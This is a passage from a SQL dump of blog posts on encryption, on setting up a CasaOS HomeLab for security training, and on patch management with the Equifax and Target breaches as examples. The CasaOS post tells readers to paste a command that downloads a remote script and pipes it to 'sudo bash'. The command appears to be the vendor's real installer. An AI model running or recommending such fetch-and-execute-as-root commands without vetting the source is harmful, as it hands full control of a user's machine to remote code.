my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Encrypt Data at Rest and in Transit</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Safeguard all data—even when it\'s stored on devices or transmitted across networks—with robust encryption.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Choose Strong Encryption Protocols</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Adopt well-vetted protocols like AES-256 and RSA-2048 for reliable data security.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Regularly Update Encryption Keys</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Periodically rotate and manage encryption keys using a centralized key management system to prevent vulnerabilities.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"5\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Conduct Routine Security Audits</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Evaluate your encryption practices and identify areas for improvement through regular security audits.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Critical Role of Encryption and Third-Party Solutions in Securing Cyberspace</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Equifax and WannaCry incidents highlight not just the need for strong encryption and expedient patch management but also the importance of third-party solutions. Trusted third-party tools for patch automation and advanced encryption can provide expertise and efficiency that many in-house teams may lack.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Data breaches and ransomware attacks are stark reminders of the gaps in modern cybersecurity approaches, but they’re also opportunities to learn and evolve. Enterprises must not only adopt encryption and patch management practices but also build a culture of shared responsibility, in which everyone—from IT admins to executives—understands their role in safeguarding sensitive data.\r\n\r\n</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Encryption acts as the guardian of data security, defending sensitive information from prying eyes. But it is most effective when paired with a proactive approach to cybersecurity, including sophisticated patch management and robust vulnerability assessments.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By understanding the lessons of high-profile cybersecurity incidents like Equifax and WannaCry, organizations can implement solutions that prevent history from repeating itself. For IT professionals, tech enthusiasts, and cybersecurity learners alike, the message is clear—prepare, encrypt, and patch to secure the future of cyberspace.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Looking to deepen your understanding of encryption and implement best practices in your organization? Stay ahead of the curve by exploring advanced cybersecurity strategies and integrating reliable third-party solutions into your framework. The future of data security starts</p>', '', NULL, NULL, 1, 'draft', '2025-01-14 15:00:19', '2026-01-12 21:41:44', 'Information Security', 'Unraveling Encryption: The Guardian of Data Security', '', NULL),
(76, 'Building a Secure HomeLab with CasaOS', 'building-a-secure-homelab-with-casaos', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The digital landscape grows more complex every day, and staying ahead in cybersecurity has never been more important. For IT professionals, cybersecurity learners, and tech enthusiasts, a HomeLab can be a game-changing environment for learning, testing, and innovating. Add CasaOS to the mix—a lightweight yet powerful open-source operating system—and you\'ve got the perfect foundation for building a secure, efficient, and future-ready HomeLab.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This guide will walk you through setting up your HomeLab with CasaOS, using it as a platform for cybersecurity training, and future-proofing it for the digital challenges of tomorrow.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Build a HomeLab?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Creating a HomeLab is like building a personal IT playground. It’s a private setup where you can experiment with IT security measures, prepare for cyber incident response scenarios, tackle cybersecurity training challenges, or even enhance network solutions for small businesses. Whether you\'re honing skills for professional growth or testing the latest cybersecurity trends, a HomeLab enables hands-on learning at its best.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">CasaOS takes this a step further with its intuitive interface, Docker support, and scalability, making it an ideal OS for building and managing a HomeLab.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Section 1: Setting Up Your Secure HomeLab</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Choosing the Right Hardware</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While it’s possible to create a HomeLab with a modest budget, choosing the right hardware is essential. Begin with a machine that balances performance and energy efficiency—such as a repurposed mini-PC, a Raspberry Pi, or a server-grade workstation if your requirements are more intense. Ensure that your hardware supports virtualization and provides ample CPU and RAM for running Docker containers, virtual machines, and other tools CasaOS supports.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Installation and Configuration of CasaOS</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Start by installing CasaOS on your chosen hardware. Here\'s a simplified guide to get started:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Visit the <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://www.casaos.io\">CasaOS website</a> and download the latest release.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Flash the image onto an SD card or USB drive using tools like Rufus or BalenaEtcher.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Connect the storage device to your hardware and boot it into CasaOS.</li>\r\n</ol>\r\nOr just install any Linux OS. Great news Ubuntu works great! Paste this to the terminal.\r\n<p style=\"text-align: center\"><code>curl -fsSL https://get.casaos.io | sudo bash</code></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Follow the on-screen instructions, which are beginner-friendly, even for those new to server setups. Once installed, you’ll have access to a clean, modern interface for managing your system.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Securing Your HomeLab Network</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Security is paramount for any HomeLab. Implement these measures to keep your setup safe:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Use Strong Passwords:</strong></b> Protect your CasaOS admin panel and other interfaces with robust, unique passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Enable a Firewall</strong></b>: Configure a firewall to restrict unauthorized access to your network.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Segregate Your Network:</strong></b> Use VLANs to segment your HomeLab from your home network to minimize exposure to potential attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Keep Your System Updated:</strong></b> Regularly check and apply updates to CasaOS and any installed software.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Section 2: Utilizing CasaOS for Cybersecurity Training</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">CasaOS Features for Security Testing</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">CasaOS excels in providing tools and features that make cybersecurity testing practical and accessible. For example, CasaOS supports:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Docker integration, allowing you to run security tools effortlessly within containers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Virtualized environments that mimic real-world networks for testing attack and defence strategies.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">A centralized interface for managing and monitoring multiple services.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Implementing Docker Containers for Security Challenges</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Docker enhances CasaOS significantly in the context of cybersecurity. Containers can be deployed for:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Penetration Testing</strong></b> using tools like Metasploit or Kali Linux.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Vulnerability Scanning</strong></b> with OpenVAS or Nessus containers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Threat Detection</strong></b> by running SIEM systems like Elasticsearch and Kibana.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">You can easily launch and manage these tools within a modular, sandboxed environment.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Cybersecurity Training in a HomeLab</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To maximize training effectiveness, follow these best practices:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Maintain isolation between your training and home networks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Document all experiments, scenarios, and outcomes for reflection and improvement.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Blend automation and manual effort to replicate real-world incident responses. CasaOS configurations can aid in setting up automated alerts or scripts to simulate breaches.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Section 3: Future-Proofing Your HomeLab with CasaOS</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Adapting to Cybersecurity Trends and New Technologies</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity landscape evolves quickly. To keep your HomeLab relevant:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Set up regular updates for CasaOS and your Docker containers to integrate the latest tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Stay informed about emerging cybersecurity trends, such as zero trust, endpoint security enhancements, and AI-driven threat detection.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of HomeLabs in Preparing for Cyber Incident Response</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By simulating real-world attack scenarios, a HomeLab helps you build skills in detecting, containing, and responding to cyber incidents. CasaOS further simplifies this process, thanks to its ability to manage multiple virtualized environments for dynamic threat response simulations.\r\n\r\n</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A secure HomeLab is not just a fancy tech endeavour—it’s a powerful tool for enhancing IT security skills, navigating cybersecurity trends, and building preparedness for challenges in the rapidly changing digital space. CasaOS stands out as an incredible base for your HomeLab, whether you’re new to cybersecurity or a seasoned professional looking to upskill.</p>', '', NULL, NULL, 1, 'draft', '2025-01-13 15:30:44', '2026-01-12 21:41:44', 'Projects', 'Building a Secure HomeLab with CasaOS', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(77, 'Patching the Paradox: Securing Cyberspace with Third-Party Reliability', 'patching-the-paradox-securing-cyberspace-with-third-party-reliability', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is no longer a luxury; it’s a necessity. For organizations navigating the digital age, safeguarding sensitive data and ensuring system integrity are critical to survival in an era marked by increasing cyber threats. Yet, vulnerabilities continue to plague businesses, leaving them exposed to potentially devastating consequences.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog explores why identifying vulnerabilities, patching them swiftly, and leveraging reliable third-party solutions are pivotal components of a robust cybersecurity strategy.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Understanding Vulnerabilities</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What are Vulnerabilities?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A vulnerability in cybersecurity refers to a weakness or flaw in an organization’s system, application, or network that can be exploited by attackers to compromise the system. These vulnerabilities can result from design flaws, misconfiguration, outdated software, or insufficient user awareness.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Common Vulnerabilities and Their Impact</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Some typical vulnerabilities include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Unpatched Software:</strong></b> When organizations delay updating software, it creates an opportunity for attackers to exploit known weaknesses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Weak Passwords:</strong></b> Poor password hygiene provides easy access for hackers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Misconfigured Networks:</strong></b> Incorrectly set up systems may inadvertently provide unauthorized access to sensitive data.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The impact can range from data theft and financial losses to damaged reputations and regulatory penalties. The stakes are high, yet organizations often struggle to stay ahead.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Patching Paradox</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Patching is Often Neglected</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While the concept of patching vulnerabilities seems straightforward, several challenges arise:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Resource Constraints:</strong></b> IT teams may lack the manpower to implement frequent updates.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Downtime Risks:</strong></b> Patches may temporarily disrupt operations, discouraging organizations from addressing issues promptly.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Complexity:</strong></b> Larger organizations must address many systems, making prioritization difficult.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Costs of Falling Behind</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Neglecting timely patching leaves businesses exposed. Cybercriminals frequently exploit known vulnerabilities, and failing to keep up with updates significantly increases the risk of breaches.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of Reliable Third Parties</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Third-Party Solutions in Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One way organizations can address these challenges is by collaborating with third-party vendors who specialize in cybersecurity solutions. These providers ensure their applications are consistently updated and fortified against evolving threats.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of Reliable Third-Party Providers</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Timely Updates:</strong></b> Trusted vendors prioritize regular updates to address the latest vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Scalability:</strong></b> Third-party solutions are often versatile enough to meet the changing needs of growing businesses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Expertise:</strong></b> These companies invest in top-tier cybersecurity professionals who bring expertise that may not be available in-house.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Case Studies and Examples</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Equifax Data Breach (2017)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Equifax breach, one of the most infamous cyber incidents in recent memory, exposed the personal records of 147 million people. The attackers exploited an unpatched vulnerability in Apache Struts, a popular web application framework. The failure to address this known issue allowed attackers to infiltrate and steal sensitive data, leading to an immense reputational and financial loss for Equifax.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Mitigation Lesson:</strong></b> Had Equifax implemented timely patches or relied on a third-party vendor that proactively updated its systems, the breach could have been avoided.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Target Data Breach (2013)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Target breach, attributed to vulnerabilities in a third-party vendor’s network credentials, resulted in 40 million customers’ credit cards being compromised. Attackers exploited inadequate network segmentation and credential security to gain access to the larger system.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Mitigation Lesson:</strong></b> Using reliable third-party providers with robust security practices and ensuring regular patching of systems would have significantly minimized the attack\'s scope.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Organizations</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Steps for Better Vulnerability Management</h3>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Implement a Proactive Patch Management Process:</strong></b> Regularly schedule updates, prioritize critical patches, and test patches in a controlled environment before applying them organization-wide.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Collaborate with Reliable Vendors:</strong></b> Choose third-party providers known for their consistent updates and transparent security practices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Monitor and Audit Systems:</strong></b> Use cybersecurity monitoring tools to identify vulnerabilities in real time and act quickly.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Train Staff in Cybersecurity Awareness:</strong></b> Ensure teams understand and follow best practices, from password management to avoiding phishing scams.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Adopt Layered Security Measures:</strong></b> Combine patching with firewalls, endpoint protection, and network segmentation.</li>\r\n</ol>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Building a Culture of 